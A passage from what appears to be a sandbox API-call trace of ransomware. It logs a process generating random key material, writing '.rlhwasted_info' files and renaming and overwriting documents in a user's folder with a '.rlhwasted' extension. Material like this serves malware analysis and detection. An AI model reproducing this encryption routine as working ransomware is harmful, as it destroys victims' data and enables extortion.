Size=0xa34) returned 0x6ef280 [0190.414] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0190.415] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.415] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Wt0c4y3.rtf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wt0c4y3.rtf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.416] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.417] SetEndOfFile (hFile=0x10c) returned 1 [0190.417] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.417] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.417] lstrcpyW (in: lpString1=0x6ee4ea, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Wt0c4y3.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wt0c4y3.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Wt0c4y3.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wt0c4y3.rtf.rlhwasted")) returned 1 [0190.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Wt0c4y3.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wt0c4y3.rtf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0190.419] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0190.419] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0190.420] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.420] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.420] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.421] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.421] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.481] SetEndOfFile (hFile=0x10c) returned 1 [0190.483] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.483] CloseHandle (hObject=0x10c) returned 1 [0190.488] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0190.488] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0190.489] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.489] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\_p86ARPngS4ws5.ods") returned 80 [0190.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0190.489] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.490] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0190.490] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.490] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\_p86ARPngS4ws5.ods.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\_p86arpngs4ws5.ods.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.491] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.492] SetEndOfFile (hFile=0x10c) returned 1 [0190.492] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.492] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.492] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\_p86ARPngS4ws5.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\_p86arpngs4ws5.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\_p86ARPngS4ws5.ods.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\_p86arpngs4ws5.ods.rlhwasted")) returned 1 [0190.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\_p86ARPngS4ws5.ods.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\_p86arpngs4ws5.ods.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0190.493] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0190.497] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.498] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.498] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.498] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.499] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.499] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.511] SetEndOfFile (hFile=0x10c) returned 1 [0190.513] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.514] CloseHandle (hObject=0x10c) returned 1 [0190.828] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0190.828] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0190.829] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.829] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.829] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0190.829] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29c) returned 0x6ee458 [0190.829] lstrcpyW (in: lpString1=0x6ee4ea, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.830] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0190.830] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0190.830] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0190.831] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0190.881] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.882] SetEndOfFile (hFile=0x128) returned 1 [0190.883] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.883] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0190.883] lstrcpyW (in: lpString1=0x6ee4ea, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.rlhwasted")) returned 1 [0190.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.926] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0190.990] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.991] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.991] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.991] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.992] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.992] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.024] SetEndOfFile (hFile=0x128) returned 1 [0191.033] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.034] CloseHandle (hObject=0x128) returned 1 [0191.062] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0191.062] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x711070) returned 1 [0191.063] CryptGenRandom (in: hProv=0x711070, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0191.063] CryptReleaseContext (hProv=0x711070, dwFlags=0x0) returned 1 [0191.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nyp--dTKV0.xlsx") returned 59 [0191.063] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6ee458 [0191.063] lstrcpyW (in: lpString1=0x6ee4ce, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.063] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0191.063] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x711070) returned 1 [0191.064] CryptGenRandom (in: hProv=0x711070, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0191.064] CryptReleaseContext (hProv=0x711070, dwFlags=0x0) returned 1 [0191.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nyp--dTKV0.xlsx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nyp--dtkv0.xlsx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0191.067] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0191.092] SetEndOfFile (hFile=0x128) returned 1 [0191.092] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.092] lstrcpyW (in: lpString1=0x6ee4ce, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nyp--dTKV0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nyp--dtkv0.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nyp--dTKV0.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nyp--dtkv0.xlsx.rlhwasted")) returned 1 [0191.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nyp--dTKV0.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nyp--dtkv0.xlsx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0191.233] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0191.234] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0191.322] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.322] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.322] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0191.323] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0191.323] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.368] SetEndOfFile (hFile=0x128) returned 1 [0191.371] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0191.371] CloseHandle (hObject=0x128) returned 1 [0191.377] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0191.378] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f98) returned 1 [0191.379] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0191.379] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0191.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\plyG9QJwRBkGJv.docx") returned 63 [0191.379] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x6d4580 [0191.379] lstrcpyW (in: lpString1=0x6d45fe, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.379] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0191.379] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f98) returned 1 [0191.380] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0191.380] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0191.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\plyG9QJwRBkGJv.docx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plyg9qjwrbkgjv.docx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0191.381] WriteFile (in: hFile=0x128, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0191.382] SetEndOfFile (hFile=0x128) returned 1 [0191.382] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.383] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0191.383] lstrcpyW (in: lpString1=0x6d45fe, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\plyG9QJwRBkGJv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plyg9qjwrbkgjv.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\plyG9QJwRBkGJv.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plyg9qjwrbkgjv.docx.rlhwasted")) returned 1 [0191.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\plyG9QJwRBkGJv.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plyg9qjwrbkgjv.docx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0191.384] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0191.385] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f98) returned 1 [0191.386] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.387] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0191.387] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f98) returned 1 [0191.388] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0191.388] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0191.400] SetEndOfFile (hFile=0x128) returned 1 [0191.403] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0191.403] CloseHandle (hObject=0x128) returned 1 [0191.480] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0191.483] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0191.487] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0191.487] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PNMqNL_1h3.xlsx") returned 59 [0191.487] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6d4580 [0191.487] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.487] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0191.487] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0191.488] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0191.488] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PNMqNL_1h3.xlsx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pnmqnl_1h3.xlsx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0191.542] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0191.544] SetEndOfFile (hFile=0x104) returned 1 [0191.544] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.544] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.544] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PNMqNL_1h3.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pnmqnl_1h3.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PNMqNL_1h3.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pnmqnl_1h3.xlsx.rlhwasted")) returned 1 [0191.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PNMqNL_1h3.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pnmqnl_1h3.xlsx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0191.546] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0191.548] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x711070) returned 1 [0191.550] CryptGenRandom (in: hProv=0x711070, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.550] CryptReleaseContext (hProv=0x711070, dwFlags=0x0) returned 1 [0191.550] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x711070) returned 1 [0191.551] CryptGenRandom (in: hProv=0x711070, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0191.551] CryptReleaseContext 